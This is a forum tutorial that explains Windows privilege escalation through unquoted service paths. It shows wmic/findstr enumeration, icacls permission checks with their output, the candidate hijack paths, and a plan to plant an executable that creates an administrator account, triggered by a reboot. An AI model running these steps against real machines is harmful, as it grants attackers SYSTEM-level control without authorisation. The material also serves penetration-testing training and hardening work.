Windows Privilege Escalation – Unquoted Services

So, you’ve popped a user shell on a windows box and now you’re looking to escalate those privileges. Great! In this article we’ll look at one method of elevating your privileges by exploiting unquoted system services.

A Windows service is a program that runs in the background similar to a *nix daemon. Often they are automatically started when Windows loads but they can also be started manually by a user or by other software. When installing a Windows service a registry key is created at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services for the service along with several values. One of those values is the ImagePath value seen in this image and is used to specify the location of the service executable.

In this image you can see the file path is not surrounded by quotes and becomes a candidate for escalating our privileges. When a Windows service is started the CreateProcess function is used to start the service executable. If the ImagePath value is not surrounded by quotes the CreateProcess function must try to interpret the correct path to the service executable. For example, if the ImagePath value contained c:\program files\sub dir\program name then the function would attempt to execute the following:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe

If any of these directories have weak permissions this allows us to place a malicious executable that Windows will run as SYSTEM allowing us to escalate our privileges. Now that we know how to take advantage of unquoted services let’s look at how to find them. You could simply look through the registry checking each service but that would take some time. An easier method is to query WMI and retrieve all services and then filter the results. This can be accomplished by executing the following command to list all services:

C:\>wmic service get name,pathname,startmode

While this method will list all the services name, path to executable, and start mode we can go a few steps further to prune down our list to just those services that are unquoted. Let’s try the following command using the findstr command to filter our results:

C:\>wmic service get name,pathname,startmode |findstr /i /v “C:\Windows\\” |findstr /i /v “””
Name                                 PathName                                                                                   StartMode
VulnService                       C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe                       Auto

We pipe our results from wmic into the findstr program using the /i option to specify our search is not to be case sensitive and the /v option to show only those lines which do not contain a match. This will filter out all the Windows services and any services which contain quotes leaving us only with those service that are unquoted. Lucky for us we found a service named VulnService which has not been quoted and its StartMode is set to Auto. This means if we have appropriate permissions we can place a malicious executable at any of the following locations and our malicious exe will be executed with SYSTEM privileges the next time the service is started.

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln Service.exe
C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe

To check permissions on a directory we can use the icacls tools. Let’s see what we come up with. We’ll check each directory looking for write permissions:

C:\>icacls “c:”

c:
   BUILTIN\Administrators:(F)

   BUILTIN\Administrators:(OI)(CI)(IO)(F)

   NT AUTHORITY\SYSTEM:(F)

   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)

   BUILTIN\Users:(OI)(CI)(RX)

   NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)

   NT AUTHORITY\Authenticated Users:(AD)

   Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

 

C:\>icacls “C:\Program Files (x86)”

C:\Program Files (x86)

                       NT SERVICE\TrustedInstaller:(F)

                       NT SERVICE\TrustedInstaller:(CI)(IO)(F)

                       NT AUTHORITY\SYSTEM:(M)

                       NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)

                       BUILTIN\Administrators:(M)

                       BUILTIN\Administrators:(OI)(CI)(IO)(F)

                       BUILTIN\Users:(RX)

                       BUILTIN\Users:(OI)(CI)(IO)(GR,GE)

                       CREATOR OWNER:(OI)(CI)(IO)(F)

 

C:\>icacls “C:\Program Files (x86)\Vuln Service”

C:\Program Files (x86)\Vuln Service

BUILTIN\Users:(OI)(CI)(F)

                                    NT SERVICE\TrustedInstaller:(I)(F)

                                    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)

                                    NT AUTHORITY\SYSTEM:(I)(F)

                                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)

                                    BUILTIN\Administrators:(I)(F)

                                    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)

                                    BUILTIN\Users:(I)(RX)

                                    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

                                    CREATOR OWNER:(I)(OI)(CI)(IO)(F)

 

C:\>icacls “C:\Program Files (x86)\Vuln Service\Vuln Service Bin”

C:\Program Files (x86)\Vuln Service\Vuln Service Bin

BUILTIN\Users:(OI)(CI)(F)

                                                     NT SERVICE\TrustedInstaller:(I)(F)

                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)

                                                     NT AUTHORITY\SYSTEM:(I)(F)

                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)

                                                     BUILTIN\Administrators:(I)(F)

                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)

                                                     BUILTIN\Users:(I)(RX)

                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Sweet! We found two directories C:\Program Files (x86)\Vuln Service\ and C:\Program Files (x86)\Vuln Service\Vuln Service Bin/ which allows USERS full control (F) over the directories. This means we can place a malicious executable at any of the following locations to exploit the unquoted service:

C:\Program Files (x86)\Vuln Service\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln Service.exe
C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe

Now all we need is a malicious executable to elevate our permissions. There’s a lot of ways you can go about doing this and I’m choosing to create a C# program to create a new administrator account named 1up with the password secret. Let’s get started writing our C# code.

View C# Source Code Here

Now compile the code using Visual Studio Community and place the executable at any of the target locations we discovered with write permissions. Once your malicious executable is in place the final task is to restart the service to execute our exe. You’ll likely find you won’t have the needed permissions to restart the service. Since the service was set to AUTO we simply wait until the system reboots or we can reboot the system ourselves with:

shutdown -r

If all goes well when Windows reboots it will start our malicious executable creating a new administrator user that we can use to elevate our permissions which completes our hack.

Check out the YouTube video

Happy Hacking!

 

Tags:

This topic contains 0 replies, has 1 voice, and was last updated by  HackHappy 1 month ago.

The forum ‘Community Articles’ is closed to new topics and replies.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Copyright ©2018 Caendra, Inc.

Sign in with Caendra

Forgot password?Sign up

Forgot your details?